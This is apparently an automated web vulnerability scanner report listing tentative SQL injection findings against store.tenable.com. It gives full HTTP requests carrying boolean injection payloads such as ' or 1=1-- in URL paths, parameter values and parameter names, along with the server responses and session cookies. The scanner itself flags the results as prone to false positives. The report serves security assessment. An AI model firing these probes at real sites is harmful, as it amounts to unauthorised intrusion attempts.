<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl'
...[SNIP]...

1.7. https://store.tenable.com/ [main_page parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /

Issue detail

The main_page parameter appears to be vulnerable to SQL injection attacks. The payloads 23679891'%20or%201%3d1--%20 and 23679891'%20or%201%3d2--%20 were each submitted in the main_page parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?main_page=index23679891'%20or%201%3d1--%20&cPath=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:51:54 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Request 2

GET /?main_page=index23679891'%20or%201%3d2--%20&cPath=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:51:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 21734

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Page Not Found : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping Page Not Found" />
<meta name="description" content="Tenable Store : Page Not Found - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ss
...[SNIP]...

1.8. https://store.tenable.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 94659222%20or%201%3d1--%20 and 94659222%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?main_page=index&cPath=1&194659222%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:55:18 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Request 2

GET /?main_page=index&cPath=1&194659222%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26479

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>ProfessionalFeed : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping ProfessionalFeed" />
<meta name="description" content="Tenable Store : ProfessionalFeed - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl
...[SNIP]...

1.9. https://store.tenable.com/includes/templates/tenable/css/t.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/css/t.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 45960039'%20or%201%3d1--%20 and 45960039'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes45960039'%20or%201%3d1--%20/templates/tenable/css/t.css?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:39 GMT
Server: Apache
Content-Length: 257
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes45960039' or 1=1-- /templates/tenable/css/t.css
on this server.</p>
</body></html>

Request 2

GET /includes45960039'%20or%201%3d2--%20/templates/tenable/css/t.css?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:48:39 GMT
Server: Apache
Content-Length: 253
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /includes45960039' or 1=2-- /templates/tenable/css/t.css was not found on this server.</p>
</body></html>

1.10. https://store.tenable.com/includes/templates/tenable/css/t.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/css/t.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16156446%20or%201%3d1--%20 and 16156446%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/css/t.css?v=1&116156446%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:31 GMT
Server: Apache
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/css/t.css
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/css/t.css?v=1&116156446%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:32 GMT
Server: Apache
Last-Modified: Fri, 14 Jan 2011 16:46:56 GMT
ETag: "12ee30-caf6-2e9b8000"
Accept-Ranges: bytes
Content-Length: 51958
Connection: close
Content-Type: text/css

/**
* !! IMPORTANT !!
* Please make sure that whenever changes are made to this file that it is
* recompressed and saved in T.MIN.CSS as well. This file is NOT used by the
* public-facing site, it is only called within the administrative environment.
*/
@media screen, print {
/**
* @section YUI Reset;
* @note uncompressed available at ./uncompressed/reset.css;
**/
html{color:#000;background:#FFF;}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,button,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,em,strong,th,var,optgroup{font-style:inherit;font-weight:inherit;}del,ins{text-decoration:none;}li{list-style:none;}caption,th{text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym{border:0;font-variant:normal;}sup{vertical-align:baseline;}sub{vertical-align:baseline;}legend{color:#000;}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;}input,button,textarea,select{*font-size:100%;}


/**
* @section 960 grid; 12 & 16 column; 10px margin;
* @note uncompressed available at ./uncompressed/960margin10.css;
**/
.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15,.grid_16{display:inline;float:left;margin-left:10px;margin-right:10px}.alpha{margin-left:0}.omega{margin-right:0}.container_12 .grid_1 {width:60px}.container_12 .grid_2 {width:140px}.container_12 .grid_3 {width:220px}.container_
...[SNIP]...

1.11. https://store.tenable.com/includes/templates/tenable/css/t.css [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/css/t.css

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 12532255%20or%201%3d1--%20 and 12532255%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/css/t.css?v=112532255%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:10 GMT
Server: Apache
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/css/t.css
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/css/t.css?v=112532255%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:10 GMT
Server: Apache
Last-Modified: Fri, 14 Jan 2011 16:46:56 GMT
ETag: "12ee30-caf6-2e9b8000"
Accept-Ranges: bytes
Content-Length: 51958
Connection: close
Content-Type: text/css

/**
* !! IMPORTANT !!
* Please make sure that whenever changes are made to this file that it is
* recompressed and saved in T.MIN.CSS as well. This file is NOT used by the
* public-facing site, it is only called within the administrative environment.
*/
@media screen, print {
/**
* @section YUI Reset;
* @note uncompressed available at ./uncompressed/reset.css;
**/
html{color:#000;background:#FFF;}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,button,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,em,strong,th,var,optgroup{font-style:inherit;font-weight:inherit;}del,ins{text-decoration:none;}li{list-style:none;}caption,th{text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym{border:0;font-variant:normal;}sup{vertical-align:baseline;}sub{vertical-align:baseline;}legend{color:#000;}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;}input,button,textarea,select{*font-size:100%;}


/**
* @section 960 grid; 12 & 16 column; 10px margin;
* @note uncompressed available at ./uncompressed/960margin10.css;
**/
.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15,.grid_16{display:inline;float:left;margin-left:10px;margin-right:10px}.alpha{margin-left:0}.omega{margin-right:0}.container_12 .grid_1 {width:60px}.container_12 .grid_2 {width:140px}.container_12 .grid_3 {width:220px}.container_
...[SNIP]...

1.12. https://store.tenable.com/includes/templates/tenable/img/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/img/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 82626339'%20or%201%3d1--%20 and 82626339'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes82626339'%20or%201%3d1--%20/templates/tenable/img/favicon.ico HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:49:34 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes82626339' or 1=1-- /templates/tenable/img/favicon.ico
on this server.</p>
</body></html>

Request 2

GET /includes82626339'%20or%201%3d2--%20/templates/tenable/img/favicon.ico HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:49:34 GMT
Server: Apache
Content-Length: 259
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /includes82626339' or 1=2-- /templates/tenable/img/favicon.ico was not found on this server.</p>
</body></html>

1.13. https://store.tenable.com/includes/templates/tenable/jscript/t.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/t.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 76127428'%20or%201%3d1--%20 and 76127428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes76127428'%20or%201%3d1--%20/templates/tenable/jscript/t.js?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:43 GMT
Server: Apache
Content-Length: 260
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes76127428' or 1=1-- /templates/tenable/jscript/t.js
on this server.</p>
</body></html>

Request 2

GET /includes76127428'%20or%201%3d2--%20/templates/tenable/jscript/t.js?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:48:43 GMT
Server: Apache
Content-Length: 256
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /includes76127428' or 1=2-- /templates/tenable/jscript/t.js was not found on this server.</p>
</body></html>

1.14. https://store.tenable.com/includes/templates/tenable/jscript/t.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/t.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11526221%20or%201%3d1--%20 and 11526221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/jscript/t.js?v=1&111526221%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:37 GMT
Server: Apache
Content-Length: 241
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/jscript/t.js
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/jscript/t.js?v=1&111526221%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:37 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 18:50:02 GMT
ETag: "12ee26-293d-5b094a80"
Accept-Ranges: bytes
Content-Length: 10557
Connection: close
Content-Type: application/x-javascript

// helper classes;
jQuery(function($){
// browser font inconsistantcies;
if($.browser.safari === true) {
$('body').addClass('webkit');
}
if(navigator.userAgent.indexOf('Win') > 0) {
$('body').addClass('windows');
}

// IE lack of CSS3 support;
$('div.moduleSubsection:last-child').addClass('last-child');
$('div.moduleProduct:last-child').addClass('last-child');
$('div.moduleCarousel:last-child').addClass('last-child');
$('#nav li:first-child').addClass('first-child');
$('#nav li:last-child').addClass('last-child');

if($.browser.msie === true && parseInt($.browser.version, 10) < 7) {
$('input[type=text]').addClass('text');
$('input[type=submit]').addClass('submit');
}
});

// #navMain interaction;
jQuery(function($){
function show(){
$('#navMain li.hover').removeClass('hover');
       $(this).addClass('hover');
   }
function hide(){
       $(this).removeClass('hover');
   }

$('#navMain>ul>li').hoverIntent({
